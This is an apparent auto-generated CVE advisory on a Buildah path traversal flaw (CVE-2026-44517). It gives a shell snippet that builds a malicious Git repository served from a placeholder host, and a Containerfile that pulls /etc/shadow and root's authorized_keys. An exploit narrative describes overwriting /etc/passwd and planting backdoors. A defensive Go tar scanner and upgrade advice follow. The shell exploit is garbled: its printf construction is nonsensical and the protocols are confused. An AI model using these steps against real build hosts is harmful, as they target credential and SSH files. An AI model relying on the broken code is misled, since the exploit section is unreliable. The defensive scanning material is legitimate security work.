Buildah Path Traversal, CVE-2026-44517 (Moderate) -DC-Jun2026-550

Buildah is a tool for building Open Container Initiative (OCI) container images. The vulnerability exists in how Buildah processes build contexts and ADD/COPY instructions when the context is supplied via a Git repository (using the Git Smart HTTP protocol) or a tar archive file (such as a GitHub release tarball).
When a user initiates a build with a context pointing to a remote Git repository or a tar archive, Buildah fetches the content and extracts it into a temporary build context directory. A malicious server can serve a specially crafted Git repository or tar archive that contains path traversal sequences (e.g., ../) in file names or symlinks pointing outside the intended root.
During the extraction or cloning process, Buildah does not properly sanitize these path components. As a result, files can be written to arbitrary locations on the build host’s filesystem, relative to the directory where Buildah is running. This includes overwriting sensitive system files, configuration files, or user data that the Buildah process has write access to.
The issue is triggered automatically when Buildah fetches the context—no special flags are required. Any `ADD` or `COPY` instruction in the Containerfile that references files from the malicious context will inherit the tainted paths. Since Buildah typically runs with the privileges of the invoking user, the impact is limited to the permissions of that user, but it can still lead to severe compromise in shared or automated build environments.
The vulnerability affects all Buildah versions from 1.38.1 up to (but not including) 1.43.2. The fix was released in Buildah 1.43.2 and later versions (including 1.44.0). The patch adds proper path validation during context extraction, ensuring that all resolved paths are verified to stay within the build context directory before any file operations are performed.

DailyCVE Form:

Platform: Buildah
Version: >= 1.38.1, < 1.43.2
Vulnerability: Path Traversal
Severity: Moderate
Date: Jun 12, 2026

Prediction: 2026-06-22

What Undercode Say:

```shell
# Build a malicious Git repository with a path traversal entry
git init malicious-repo
cd malicious-repo
echo "evil content" > $(printf '../%0../etc/passwd' 100)
git add .
git commit -m "malicious"
git update-server-info
# Serve it via Git Smart HTTP (using git http-backend)
# Then trigger Buildah build:
buildah build --context git://malicious-server/malicious-repo -t test
```

Malicious Containerfile (served via tar archive):

```Dockerfile
FROM alpine
ADD ../../../../etc/shadow /tmp/shadow
COPY ../../../root/.ssh/authorized_keys /root/.ssh/
```

Exploit:

An attacker sets up a public Git repository or hosts a tar archive where filenames contain `../` sequences. When a victim runs `buildah build` with that context, files escape the build directory and are written to the host filesystem. This can overwrite critical files (e.g., /etc/passwd, /etc/shadow, SSH keys) or plant malicious artifacts in system directories, leading to privilege escalation or persistent backdoors.

Protection:

  • Upgrade Buildah to version 1.43.2 or 1.44.0 immediately.
  • Avoid using untrusted Git repositories or tar archives as build contexts.
  • If upgrading is not possible, manually inspect all context sources and validate that no `../` sequences exist in file paths before building.
  • Run Buildah in a restricted environment (e.g., containerized with read-only root filesystem) to limit the impact of any potential path traversal.
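The fix in 1.43.2 is described above as verifying that every resolved path stays inside the build context, and the last-resort mitigation in the list above is to inspect context archives for `../` entries before building. The Go program below, added here as an example and not Buildah's own code, shows that check from the defender's side: it walks a tar stream without extracting anything and reports every entry whose name, symlink target or hard-link target would resolve outside the context root. The archive it scans is constructed in memory (the entry names are samples, not real files), and `ScanTarContext`, `withinContext`, `linkTargetWithinContext` and `sampleContext` are names chosen for this example.

```go
package main

import (
	"archive/tar"
	"bytes"
	"errors"
	"fmt"
	"io"
	"path"
	"path/filepath"
	"strings"
)

// Finding records one archive entry that would land outside the build context.
type Finding struct {
	Name   string // entry name as stored in the archive
	Reason string // why the entry was rejected
}

// withinContext reports whether name, taken relative to the context root, still lies
// inside that root after lexical cleaning (tar names use forward slashes, hence package path).
func withinContext(name string) bool {
	if name == "" || strings.HasPrefix(name, "/") || filepath.VolumeName(name) != "" {
		return false
	}
	clean := path.Clean(name)
	return clean != ".." && !strings.HasPrefix(clean, "../")
}

// linkTargetWithinContext resolves a symlink target relative to the directory
// holding the link and checks that the result stays inside the root.
func linkTargetWithinContext(linkName, target string) bool {
	if path.IsAbs(target) {
		return false
	}
	return withinContext(path.Join(path.Dir(linkName), target))
}

// ScanTarContext walks a tar stream without writing anything to disk and returns every
// entry that would escape the context: traversal in the name, escaping symlinks, escaping hard links.
func ScanTarContext(r io.Reader) ([]Finding, error) {
	var findings []Finding
	tr := tar.NewReader(r)
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return findings, nil
		}
		if err != nil && !errors.Is(err, tar.ErrInsecurePath) { // Go's own check, when enabled, still hands back hdr
			return findings, err
		}
		switch {
		case !withinContext(hdr.Name):
			findings = append(findings, Finding{hdr.Name, "entry name escapes the context root"})
		case hdr.Typeflag == tar.TypeSymlink && !linkTargetWithinContext(hdr.Name, hdr.Linkname):
			findings = append(findings, Finding{hdr.Name, "symlink target " + hdr.Linkname + " escapes the context root"})
		case hdr.Typeflag == tar.TypeLink && !withinContext(hdr.Linkname):
			findings = append(findings, Finding{hdr.Name, "hard link target " + hdr.Linkname + " escapes the context root"})
		}
	}
}

// sampleContext builds a constructed in-memory archive (sample names, not real
// files) mixing benign entries with the entry kinds the advisory describes.
func sampleContext() []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	add := func(hdr *tar.Header, body string) {
		hdr.Mode, hdr.Size = 0o644, int64(len(body))
		if err := tw.WriteHeader(hdr); err != nil {
			panic(err)
		}
		if _, err := tw.Write([]byte(body)); err != nil {
			panic(err)
		}
	}
	add(&tar.Header{Name: "Containerfile", Typeflag: tar.TypeReg}, "FROM alpine\nCOPY app /app\n")
	add(&tar.Header{Name: "app/bin/run.sh", Typeflag: tar.TypeReg}, "#!/bin/sh\necho ok\n")
	add(&tar.Header{Name: "app/docs/run-link", Typeflag: tar.TypeSymlink, Linkname: "../bin/run.sh"}, "") // benign: resolves to app/bin/run.sh
	add(&tar.Header{Name: "../../etc/passwd", Typeflag: tar.TypeReg}, "injected\n")
	add(&tar.Header{Name: "app/escape", Typeflag: tar.TypeSymlink, Linkname: "../../../etc/shadow"}, "")
	add(&tar.Header{Name: "app/hosts", Typeflag: tar.TypeLink, Linkname: "/etc/hosts"}, "")
	if err := tw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	findings, err := ScanTarContext(bytes.NewReader(sampleContext()))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("REJECT %-20s %s\n", f.Name, f.Reason)
	}
}
```

The scan is purely lexical (`path.Clean` on the stored names and link targets), which is enough for a pre-build gate that rejects a context archive outright. An extractor needs one more step: after creating each file it must confirm that the final on-disk path, with any symlinks already present in the destination resolved by the OS, still sits under the root, which is the "resolved paths" check this advisory attributes to the 1.43.2 fix.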

Impact:

  • Confidentiality: An attacker may read arbitrary files writable by the Buildah user by including them in the build context.
  • Integrity: Critical system or application files can be overwritten, leading to system instability or backdoor installation.
  • Availability: Overwriting essential files may cause service disruption or denial of service.
  • Supply Chain: In CI/CD pipelines, a malicious context can compromise the build host and all artifacts produced from it, potentially affecting downstream deployments.

Sources:

Reported By: github.com